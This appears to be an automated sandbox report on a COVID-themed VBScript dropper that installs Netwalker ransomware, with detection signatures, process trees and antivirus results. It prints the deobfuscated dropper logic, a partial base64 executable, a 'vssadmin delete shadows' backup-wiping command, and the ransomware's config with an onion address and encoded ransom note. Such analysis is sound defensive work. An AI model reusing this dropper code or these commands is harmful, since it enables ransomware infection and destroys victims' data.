Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\APIErrorsConstants.au3 entropy: 7.99595363557Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\GuiToolbar.au3 entropy: 7.99483060331Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\Misc.au3 entropy: 7.99003480004Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\NetShare.au3 entropy: 7.99079701727Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\GuiRichEdit.au3 entropy: 7.99537140624Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIFiles.au3 entropy: 7.99538566422Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\NTSTATUSConstants.au3 entropy: 7.99680981932Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS entropy: 7.99487655592Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM entropy: 7.99271754146Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPISys.au3 entropy: 7.99538437408Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WindowsConstants.au3 entropy: 7.99033845378Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPILocale.au3 entropy: 7.9900245833Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml entropy: 7.99039775943Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm entropy: 7.99571471216Jump to dropped file

System Summary:

barindex
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040DC10 NtSetInformationFile,2_2_0040DC10
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040DCD0 NtSetInformationFile,2_2_0040DCD0
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040E8B0 NtDuplicateObject,NtClose,NtClose,2_2_0040E8B0
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040D310 NtQuerySystemInformation,2_2_0040D310
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040EBC0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,2_2_0040EBC0
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_004078202_2_00407820
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_00405A902_2_00405A90
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_004059502_2_00405950
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040B5602_2_0040B560
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040AF702_2_0040AF70
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040AB002_2_0040AB00
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040B1802_2_0040B180
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: CORONAVIRUS_COVID-19.vbsInitial sample: Strings found which are bigger than 50
Binary contains paths to development resourcesShow sources
Source: qeSw.exe, 00000002.00000002.1480282014.000000000252A000.00000004.00000001.sdmpBinary or memory string: C:\Program Files (x86)\autoit3\AutoItX\Examples\C++\utoItX.sln
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.spre.evad.winVBS@6/226@0/0
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040D5E0 LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040D5E0
Creates files inside the program directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\autoit3\E3495D-Readme.txtJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3708:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\qeSw.exeJump to behavior
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs'
Queries a list of all open handlesShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeSystem information queried: HandleInformationJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: CORONAVIRUS_COVID-19.vbsVirustotal: Detection: 11%
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quietJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Creates a directory in C:\Program FilesShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeDirectory created: C:\Program Files\7-Zip\E3495D-Readme.txtJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: SecurityHealthAgent.pdbHeal source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscsvc.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: shellext.pdbhServic source: qeSw.exe, 00000002.00000002.1483380682.0000000002CCA000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthService.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: WscIsvIf.pdbityCent source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: shellext.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: WscIsvIf.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthSSO.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityCenterBroker.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityCenterBroker.pdbb. source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthSSO.pdb.pdbc source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscsvc.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthAgent.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeUnpacked PE file: 2.2.qeSw.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeUnpacked PE file: 2.2.qeSw.exe.400000.0.unpack
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")Set FSO = CreateObject("Scripting.FileSystemObject")Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Google.url"set oUrlLink = WshShell.CreateShortcut(Path)oUrlLink.TargetPath = "http://google.com"oUrlLink.Save(G)if (FSO.FileExists(Path)) Then WScript.Echo "Error!"elsexml = "Msxml2.DOMDocument"ws = "WScript.Shell"bin = "bin.base64"bs = "base64"db = "Adodb.Stream"Set wshs = createobject(ws)filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\qeSw.exe"end ifFunction a(n) Dim i, j, abcabc = array("!","@","%",".","?","<",">","$","#",",") For i = 0 To 9n = replace(n, abc(i), "")Nexta = replace(n,"*","/")End FunctionSet oXML = CreateObject(xml)Set oNode = oXML.CreateElement(bs)oNode.dataType = binoNode.text = strreverse(a(code))Set BinaryStream = CreateObject(db)BinaryStream.Type = 1BinaryStream.OpenBinaryStream.Write oNode.nodeTypedValueBinaryStream.SaveToFile filepathwshs.Exec(filepath)'WshShell.Popup "This file might not be the right file type, or it might be corrupted!", 20, "Windows", 0 + 48IWshShell3.ExpandEnvironmentStrings("%TEMP%");IWshShell3.CreateShortcut("C:\Users\user\AppData\Local\Temp\Google.url");IWshURLShortcut.TargetPath("http://google.com");IWshURLShortcut.Save("Unsupported parameter type 00000000");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Google.url");IWshShell3.ExpandEnvironmentStrings("%TEMP%");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFEBQjwAAAAAAAAAAOAADwELAQIAADoBAABQAwAAAAAAgDo");_Stream.Type("1");_Stream.Open();IXMLDOMElement.nodeTypedValue();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\qeSw.exe");IWshShell3.Exec("C:\Users\user\AppData\Local\Temp\qeSw.exe")
PE file contains an invalid checksumShow sources
Source: qeSw.exe.0.drStatic PE information: real checksum: 0x4be47 should be: 0x52514
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040D7E0 push ecx; mov dword ptr [esp], 00000000h2_2_0040D7E1
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_007A57B0 push edx; ret 2_2_007A593E
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_00785D51 push es; iretd 2_2_00785D5D
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0078550A push ebp; ret 2_2_00785538
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0078073D push 00000000h; ret 2_2_00780748
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_00785F0D push esp; ret 2_2_00785F13

Persistence and Installation Behavior:

barindex
Infects executable files (exe, dll, sys, html)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTMJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\qeSw.exeJump to dropped file
Creates license or readme fileShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\autoit3\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\microsoft office\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files\7-Zip\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\ProgramData\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\free window registry repair\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\autoit3\Examples\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\adobe\Acrobat Reader DC\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\autoit3\Extras\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\microsoft office\Office16\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\ProgramData\regid.1991-06.com.microsoft\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\E3495D-Readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\common files\DESIGNER\E3495D-Readme.txtJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking computer name)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleepgraph_2-8408
Found evasive API chain (may stop execution after checking system information)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_2-7471
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_2-8231
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe TID: 5724Thread sleep time: -300000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040BFC0 FindFirstFileW,FindNextFileW,2_2_0040BFC0
Contains functionality to query local drivesShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040D070 Sleep,SetErrorMode,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,2_2_0040D070
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmpBinary or memory string: *:\program file*\vmware
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmpBinary or memory string: +~C-{"mpk:"/fqCb2TTvBeb3VoL4lXa1fgDDn+sEO4+mBhIj9vrLEk=","mode:0,"spsz:15360,"thr:1000,"namesz:8,"idsz:6,"lfile:"{id}-Readme.txt,"onion:"rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion,"lend:"SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0KQWxsIGVuY3J5cHRlZCBmaWxlcyBmb3IgdGhpcyBjb21wdXRlciBoYXMgZXh0ZW5zaW9uOiAue2lkfQ0KDQotLQ0KSWYgZm9yIHNvbWUgcmVhc29uIHlvdSByZWFkIHRoaXMgdGV4dCBiZWZvcmUgdGhlIGVuY3J5cHRpb24gZW5kZWQsDQp0aGlzIGNhbiBiZSB1bmRlcnN0b29kIGJ5IHRoZSBmYWN0IHRoYXQgdGhlIGNvbXB1dGVyIHNsb3dzIGRvd24sIA0KYW5kIHlvdXIgaGVhcnQgcmF0ZSBoYXMgaW5jcmVhc2VkIGR1ZSB0byB0aGUgYWJpbGl0eSB0byB0dXJuIGl0IG9mZiwNCnRoZW4gd2UgcmVjb21tZW5kIHRoYXQgeW91IG1vdmUgYXdheSBmcm9tIHRoZSBjb21wdXRlciBhbmQgYWNjZXB0IHRoYXQgeW91IGhhdmUgYmVlbiBjb21wcm9taXNlZC4NClJlYm9vdGluZy9zaHV0ZG93biB3aWxsIGNhdXNlIHlvdSB0byBsb3NlIGZpbGVzIHdpdGhvdXQgdGhlIHBvc3NpYmlsaXR5IG9mIHJlY292ZXJ5Lg0KDQotLQ0KT3VyICBlbmNyeXB0aW9uIGFsZ29yaXRobXMgYXJlIHZlcnkgc3Ryb25nIGFuZCB5b3VyIGZpbGVzIGFyZSB2ZXJ5IHdlbGwgcHJvdGVjdGVkLCANCnRoZSBvbmx5IHdheSB0byBnZXQgeW91ciBmaWxlcyBiYWNrIGlzIHRvIGNvb3BlcmF0ZSB3aXRoIHVzIGFuZCBnZXQgdGhlIGRlY3J5cHRlciBwcm9ncmFtLg0KDQpEbyBub3QgdHJ5IHRvIHJlY292ZXIgeW91ciBmaWxlcyB3aXRob3V0IGEgZGVjcnlwdGVyIHByb2dyYW0sIHlvdSBtYXkgZGFtYWdlIHRoZW0gYW5kIHRoZW4gdGhleSB3aWxsIGJlIGltcG9zc2libGUgdG8gcmVjb3Zlci4NCg0KRm9yIHVzIHRoaXMgaXMganVzdCBidXNpbmVzcyBhbmQgdG8gcHJvdmUgdG8geW91IG91ciBzZXJpb3VzbmVzcywgd2Ugd2lsbCBkZWNyeXB0IHlvdSBvbmUgZmlsZSBmb3IgZnJlZS4NCkp1c3Qgb3BlbiBvdXIgd2Vic2l0ZSwgdXBsb2FkIHRoZSBlbmNyeXB0ZWQgZmlsZSBhbmQgZ2V0IHRoZSBkZWNyeXB0ZWQgZmlsZSBmb3IgZnJlZS4NCg0KLS0NCg0KU3RlcHMgdG8gZ2V0IGFjY2VzcyBvbiBvdXIgd2Vic2l0ZToNCg0KMS5Eb3dubG9hZCBhbmQgaW5zdGFsbCB0b3ItYnJvd3NlcjogaHR0cHM6Ly90b3Jwcm9qZWN0Lm9yZy8NCg0KMi5PcGVuIG91ciB3ZWJzaXRlOiB7b25pb259DQoNCjMuUHV0IHlvdXIgcGVyc29uYWwgY29kZSBpbiB0aGUgaW5wdXQgZm9ybToNCg0Ke2NvZGV9,"white:{"path:["*system volume information,"*windows.old,"*:\users\*\*tempmp","*msocache,"*:\winnt","*$windows.~ws,"*perflogs,"*boot,"*:\windows","*:\program file*\vmwaree","\\*\users\*\*temptemp","\\*\winntnt","\\*\windowsws","*\program file*\vmwaree","*appdata*microsoft,"*appdata*packages,"*microsoft\provisioning","*dvd maker,"*Internet Explorer,"*Mozilla,"*Mozilla*,"*Old Firefox data,"*\program file*\windows media**","*\program file*\windows portable**","*windows defender,"*\program file*\windows ntt","*\program file*\windows photo**","*\program file*\windows side**","*\program file*\windowspowershelll","*\program file*\cuass**","*\program file*\microsoft gamess","*\program file*\common files\systemem","*\program file*\common files\*shareded","*\program file*\common files\reference ass*s*","*\windows\cache**","*temporary internet*,"*media player,"*:\users\*\appdata\*\microsoftsoft","\\*\users\*\appdata\*\microsoftrosoft"],"file:["ntuser.dat*,"iconcache.db,"gdipfont*.dat,"ntuser.ini,"usrclass.dat,"usrclass.dat*,"boot.ini,"bootmgr,"bootnxt,"desktop.ini,"ntuser.dat,"autorun.inf,"ntldr,"thumbs.db,"bootsect.bak,"bootfont.bin],"ext:["msp,"exe,"sys,"msc,"mod,"clb,"mui,"regt
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmpBinary or memory string: ws","*\program file*\vmware
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmpBinary or memory string: *\program file*\vmware
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmpBinary or memory string: ","*:\program file*\vmware
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Found API chain indicative of debugger detectionShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_2-7471
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_00401250 RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll,2_2_00401250
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040D380 mov eax, dword ptr fs:[00000030h]2_2_0040D380
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeMemory protected: page execute read | page execute and read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: qeSw.exe.0.drJump to dropped file
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exeJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmpBinary or memory string: Progman
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
09:00:54API Interceptor7x Sleep call for process: qeSw.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
CORONAVIRUS_COVID-19.vbs12%VirustotalBrowse
CORONAVIRUS_COVID-19.vbs2%MetadefenderBrowse
CORONAVIRUS_COVID-19.vbs10%ReversingLabsScript-VBS.Trojan.Malscript

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\qeSw.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\qeSw.exe72%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\qeSw.exe71%ReversingLabsWin32.Trojan.Kryptik

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.1.qeSw.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.autoit.de/index.php?page=Thread&postID=483930%VirustotalBrowse
http://www.autoit.de/index.php?page=Thread&postID=483930%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://sectigo.com/CPS0B0%VirustotalBrowse
https://sectigo.com/CPS0B0%URL Reputationsafe
http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix0%VirustotalBrowse
http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix0%Avira URL Cloudsafe
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r0%VirustotalBrowse
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r0%URL Reputationsafe
http://schemas.mpv0%Avira URL Cloudsafe
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%VirustotalBrowse
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%URL Reputationsafe
http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.20%VirustotalBrowse
http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.20%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: qeSw.exe PID: 244JoeSecurity_NetwalkerYara detected Netwalker ransomwareJoe Security

    Unpacked PEs

    No yara matches

    Sigma Overview

    No Sigma rule has matched

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.